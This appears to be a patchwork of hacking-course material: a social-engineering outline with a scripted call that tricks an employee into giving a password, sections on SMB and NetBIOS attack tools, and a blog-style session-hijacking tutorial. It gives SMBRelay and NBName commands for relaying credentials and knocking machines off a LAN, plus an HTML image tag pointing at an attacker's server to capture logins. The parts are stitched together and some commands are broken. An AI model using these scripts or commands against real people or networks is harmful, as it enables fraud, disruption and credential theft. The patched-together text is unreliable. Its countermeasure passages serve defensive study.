Social Engineering: Art of Manipulation

Objective

• 
  
  What is Social Engineering?
• 
  
  Common Types of Attacks
• 
  
  Social Engineering by Phone
• 
  
  Dumpster Diving
• 
  
  Online Social Engineering
• 
  
  Reverse Social Engineering
• 
  
  Policies and Procedures
• 
  
  Employee Education

What is Social Engineering?

• 
  
  Social Engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action.
• 
  
  Companies with authentication processes, firewalls, virtual private networks and network monitoring software are still wide open to attacks
• 
  
  An employee may unwittingly give away key information in an email or by answering questions over the phone with someone they don't know or even by talking about a project with co workers at a local pub after hours.

It is said that security is only as strong as the weakest link. Social engineering is the use of influence and persuasion to deceive people for the purpose of obtaining information or persuading the victim to perform some action. It need not be restricted to corporate networks alone. It does not matter if enterprises have invested in high end infrastructure and security solutions such as complex authentication processes, firewalls, VPNs and network monitoring software. None of these devices or security measures is effective if an employee unwittingly gives away key information in an email, by answering questions over the phone with a stranger or new acquaintance or even brag about a project with coworkers at a local pub after hours.

Most often, people are not even aware of the security lapse made by them, albeit inadvertently. Attackers take special interest in developing social engineering skills and can be so proficient that their victims would not even realize that they have been scammed. Despite having security policies in place within the organization, they are compromised because this aspect of attack preys on the human impulse to be kind and helpful.

Attackers are always looking for new ways to access information. They will ensure that they know the perimeter and the people on the perimeter - security guards, receptionists and help desk workers - to exploit human oversight. People have been conditioned not to be overtly suspicious that, they associate certain behavior and appearance to known entities. For instance, on seeing a man dressed in brown and stacking a whole bunch of boxes in a cart, people will hold the door open because they think it is the delivery man.

Some companies list employees by title and give their phone number and email address on the corporate Web site. Alternatively, a corporation may put advertisements in the paper for high-tech workers who trained on Oracle databases or UNIX servers. These little bits of information help Attackers know what kind of system they're tackling. This overlaps with the reconnaissance phase.

Art of Manipulation.

• 
  
  Social Engineering includes acquisition of sensitive information or inappropriate access privileges by an outsider, based upon building of inappropriate trust relationships with outsiders.
• 
  
  The goal of a social engineer is to trick someone into providing valuable information or access to that information.
• 
  
  It preys on qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble.

Social engineering is the art and science of getting people to comply with an attacker's wishes. It is not a way of mind control, and it does not allow the attacker to get people to perform tasks wildly outside of their normal behavior. Above all, it is not foolproof. Yet, this is one way most Attackers get a foot into the corporation. There are two terms that are of interest here.

• 
  
  Social engineering is hacker jargon for getting needed information from a person rather than breaking into a system.
• 
  
  Psychological subversion is the term for using social engineering over an extended period of time to maintain a continuing stream of information and help from unsuspecting users.

Let us look at a sample scenario.

Attacker: "Good morning Ma'am, I am Bob; I would like to speak with Ms. Alice"

Alice: "Hello, I am Alice"

Attacker: "Good morning Ma'am, I am calling from the data center, I am sorry I am calling you so early..."

Alice:" Uh, data center office, well, I was having breakfast, but it doesn't matter"

Attacker: "I was able to call you because of the personal data form you filled when creating your account."

Alice: "My pers.. oh, yes"

Attacker: "I have to inform you that we had a mail server crash tonight, and we are trying to restore all corporate users' mail. Since you are a remote user, we are clearing your problems first."

Alice: "A crash? Is my mail lost?"

Attacker: "Oh no, Ma'am, we can restore it. But, since we are data center employees, and we are not allowed to mess with the corporate office user's mail, we need your password; otherwise we cannot take any action"(first try, probably unsuccessful)

Alice: "Er, my password? Well..."

Attacker: "Yes, I know, you have read on the license agreement that we will never ask for it, but it was written by the legal department, you know, all law stuff for compliance. (effort to gain victim's trust)

Attacker: Your username is AliceDxb, isn't it? Corporate sys dept gave us your username and telephone, but, as smart as they are, not the password. See, without your password nobody can access your mail, even we at the datacenter. But we have to restore your mail, and we need access. You can be sure we will not use your password for anything else, well, we will forget it." (smiling )

Alice: "Well, it's not so secret (also smiling! It's amazing...), my password is xxxxxx"

Attacker: "Thank you very much, Ma'am. We will restore your mail in a few minutes" Alice: "But no mail is lost, is it?"

Attacker: "Absolutely, Ma'am. You should not experience any problems, but do not hesitate to contact us just in case. You will find contact numbers on the Intranet"

Alice: "Thanks"

Attacker: "Goodbye"

Human Weakness

• 
  
  People are usually the weakest link in the security chain.
• 
  
  A successful defense depends on having good policies in place and educating employees to follow the policies.
• 
  
  Social Engineering is the hardest form of attack to defend against because it cannot be defended with hardware or software alone.

Social engineering concentrates on the weakest link of the computer security chain. It is often said that the only secure computer is an unplugged one. The fact that you could persuade someone to plug it in and switch it on means that even powered down computers is vulnerable.

Anyone with access to any part of the system, physically or electronically is a potential security risk. Any information that can be gained may be used for social engineering further information. This means even people not considered as part of a security policy can be used to cause a security breach. Security professionals are constantly being told that security through obscurity is very weak security. In the case of social engineering it is no security at all. It is impossible to obscure the fact that humans use the system or that they can influence it.

Attempting to steer an individual towards completing a desired task can use several methods. The first and most obvious is simply a direct request, where an individual is asked to complete the task directly. Although difficult to succeed, this is the easiest method and the most straightforward. The individual knows exactly what is wanted of them. The second is by creating a contrived situation which the victim is simply a part of. With other factors than just the request to consider, the individual concerned is far more likely to be persuaded, because the attacker can create reasons for compliance other than simply personal ones. This involves far more work for the attacker, and almost certainly involves gaining extensive knowledge of the 'target'. This does not mean that situations do not have to be based in fact. The fewer untruths, the better the chances of success.

One of the essential tools used for social engineering is a good memory for gathered facts. This is something that hackers and sysadmins tend to excel in, especially when it comes to facts relating to their field.

SMB Hacking Tools

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually. One way of increasing the speed of LOphtCrack sessions on sniffer dumps is to remove duplication and provide a facility to target specific users without having to edit the dump files manually. Therefore password cracking becomes a time-consuming laborious process unless it is targeted towards particular passwords.
If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.
SMBGrind is a tool that seeks to solve this problem and make password cracking by LOphtCrack faster. It removes duplicates and saves the file to disk so that the attacker can e-mail the filtered file directly from within SMB Grinder via the File-Send menu option.
Hacking Tool: SMBDie
SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request.
SMBDie is another tool that takes advantage of the implementation of a protocol by a vendor. The vulnerability results because of a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs - SMBDie and smbnuke exploit the vulnerability the same way.
An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.
Any machine on the network including systems that are connected via VPN can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LAN man server service can be stopped which prevents the attack, but again may not be suitable on a file and print sharing server.


Hacking Tool: NBTDeputy


•NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests.
•NBT deputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP.
•This tool works well with SMBRelay.
•For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBT Deputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"


There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

NetBIOS DoS Attack
•Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer will be able to use it.
•This will block the client from participating in the NetBIOS network.
•Tool: nbname
◦NBName can disable entire LANs and prevent machines from rejoining them.
◦Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.


NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.


For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.


NBName is a tool written by Sir Dystic of the Cult of Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.


Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.


Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.


The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.


The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.


Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.

SMBRelay man-in-the-middle Scenario

•The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, an d a target server address of 192.168.234.34 with /T. c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34
•When a victim client connects to the fraudulent server thinking it is talking to the target, MITM server intercepts the call, hashe s the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.
The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.
Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.
For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:
c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168
A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.
This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

SMBRelay Weakness and Countermeasures

•The problem is to convince a victim's client to authenticate to the MITM server •You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.
•Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server Countermeasures
•Configure Windows 2000 to use SMB signing.
•Client and server communication will cause it to cryptographically sign each block of SMB communications.
•These settings are found under Security Policies /Security Options


There are inherent weaknesses in executing a SMBRelay attack. The hindrances to this attack are pointers towards countermeasures to be adopted. Firstly SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges as this is a port number less than 1024.


SMBRelay targets and runs best on Windows NT and 2000 machines. Connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate himself to the MITM server. Ways to overcome these weaknesses include sending a malicious email
Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.
The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.


Another countermeasure is as discussed earlier in the context of SMBRelay MITM - to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection


While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.


NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

Redirecting SMB Logon to the Attacker

•Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.
•Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.
•When the hyperlink is clicked, the user unwittingly sends his credentials over the network.
SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.
While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges / authentication using sniffing techniques. This may be directly off the network using tools such as Lophtcrack SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the Lophtcrack cracking engine.

As an example, the following code submitted in the email and embedded in html brackets will show nothing in the email but, when the null gif is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server.

img src=file://attacker_server/null.gif height=1 width=1. SMBCapture will be listening on the attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.
Countermeasures include:
•Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;
•Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;
•Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.

SMB Hacking Tools - SMB Relay

•SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic. •It can also perform man-in-the-middle (MITM) attacks.
•You must disable NetBIOS over TCP/IP and block ports 139 and 445.
•Start the SMBRelay server and listen for SMB packets:
c:\>smbrelay /e c:\>smbrelay /IL 2 /IR 2 •An attacker can access the client machine by simply connecting to it via relay address using: c: \> net use * \\\c$
SMBRelay by Sir Dystic of the Cult of Dead Cow is essentially a SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, as well as making modifications to these packets when necessary.
SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.
The usage is smbrelay [options]
Options:
•/D num - Set debug level, current valid levels: 0 (none), 1, 2 Defaults to 0.
•/E - Enumerates interfaces and their indexes.
•/F[-] - Fake server only, capture password hashes and do not relay Use - to disable acting as a fake server if relay fails.
•/IL num - Set the interface index to use when adding local IP addresses.
•/IR num - Set the interface index to use when adding relay IP addresses Defaults to 1.
•/L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC Defaults to primary host IP.
•/R[-] IP - Set the starting relay IP address to use. Use [-] to not add each relay IP address to the NIC Defaults to 192.1.1.1 first.
•/S name - Set the source machine name.


The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The servers can then capture both LM and NTLM passwords, and write them to its working directory as hashes.txt which can be later imported into LOphtCrack. Furthermore, the attacker's system now can access the client machine by simply connecting to it via the relay address:
c: \>net use * \\192.x.x.x\c$
On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter

How to hack online Sessions : Session Hijacking

Hello friends, from now onwards we will explore the most advanced Hacking Techniques. One of them is Session Hijacking. In today's tutorial we will discuss How to hack the online sessions using Session Hijacking. In today's Hacking class, i will explain basics of Session Hijacking like What is session Hijacking and Different types of Session Hijacking attacks and different methods to Hijack the sessions. In my next tutorial that is tomorrow i will explain you in Detail How to Hijack the Sessions and what tools you will need to Hijack the active sessions. So friends read on...

How Session Hijacking works

What is Session Hijacking?

Let's discuss them in common term's, Session Hijacking by the name only it suggests that we are hacking someone's active session and trying to exploit it by taking the unauthorized access over their computer system or Network. So Session Hijacking is the exploitation of valid computer or network session. Sometimes technical guys also call this HTTP cookie theft or more correctly Magic Cookie Hack. Now you guys surely be thinking what is Magic Cookie.
Magic cookie is simply a cookie that is used to authenticate the user on remote server or simply computer. In general, cookies are used to maintain the sessions on the websites and store the remote address of the website. So in Session Hijacking what Hacker does is that he tries to steal the Magic cookies of the active session that's why its called HTTP cookie Theft. Nowadays several websites has started using HTTPS cookies simply called encrypted cookies. But we all know If encrypter exits so its decrypter also :P..


Session Hijacking is the process of taking over a existing active session. One of the main reason for Hijacking the session is to bypass the authentication process and gain the access to the machine. Since the session is already active so there is no need of re-authenticating and the hacker can easily access the resources and sensitive information like passwords, bank details and much more. 

Different Types of Session Hijacking

Session Hijacking involves two types of attacks :
1. Active attack
2. Passive attack


In Passive attack, the hacker Hijacks a session, but just sits back and watches and records all the traffic that is being sent from the computer or received by the computer. This is useful for finding the sensitive information like username passwords of websites, windows and much more...


In Active attack, hacker finds the active session and takes over it. This is done by forcing one of the parties offline which is usually achieved by DDOS attack (Distributed Denial of service attack) . Now the hacker takes control over the active session and executes the commands on the system that either give him the sensitive information such as passwords or allow him to login at later time.
 There are also some hybrid attacks, where the attacker watches a session for while and then becomes active by taking it over. Another way is to watch the session and periodically inject data into the active session without actually taking it over.

Methods to Hijack Sessions

 There are four main methods used to perpetrate a session hijack. These are:

• Session fixation, where the attacker sets a user's session id to one known to him, for example by sending the user an email with a link that contains a particular session id. The attacker now only has to wait until the user logs in.
• Session sidejacking, where the attacker uses packet sniffing to read network traffic between two parties to steal the session cookie. Many web sites use SSL encryption for login pages to prevent attackers from seeing the password, but do not use encryption for the rest of the site once authenticated. This allows attackers that can read the network traffic to intercept all the data that is submitted to the server or web pages viewed by the client. Since this data includes the session cookie, it allows him to impersonate the victim, even if the password itself is not compromised. Unsecured Wi-Fi hotspots are particularly vulnerable, as anyone sharing the network will generally be able to read most of the web traffic between other nodes and the access point.
• Alternatively, an attacker with physical access can simply attempt to steal the session key by, for example, obtaining the file or memory contents of the appropriate part of either the user's computer or the server.
• Cross-site scripting, where the attacker tricks the user's computer into running code which is treated as trustworthy because it appears to belong to the server, allowing the attacker to obtain a copy of the cookie or perform other operations.

That's all for today later we will discuss in detail How to do the Session Hijacking practically. 
I hope you all like this...
If you have any queries ask me in form of comments...